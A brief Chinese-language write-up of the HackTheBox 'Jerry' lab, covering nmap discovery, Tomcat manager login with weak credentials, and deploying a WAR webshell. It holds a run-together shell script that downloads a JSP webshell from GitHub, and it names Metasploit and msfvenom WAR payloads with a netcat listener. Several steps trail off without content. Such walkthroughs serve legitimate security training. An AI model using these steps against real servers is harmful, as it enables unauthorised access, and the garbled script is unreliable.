关于渗透测试:HTBJerry

easy box.

首先nmap开路：

找到8080端口：

Tomcat字典：
https://raw.githubusercontent...
找到弱口令tomcat:s3cret

部署war包：
办法1：
官网walkthrough上的：

#!/bin/shwget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jspmkdir wshellcp index.jsp wshell/cd wshelljar -cvf ../wshell.war 

部署wshell:

门路比拟深

拿到flag

办法2：
msf应用multi/http/tomcat_mgr_upload

办法3：
msfvenom生成war包

上传war包后nc: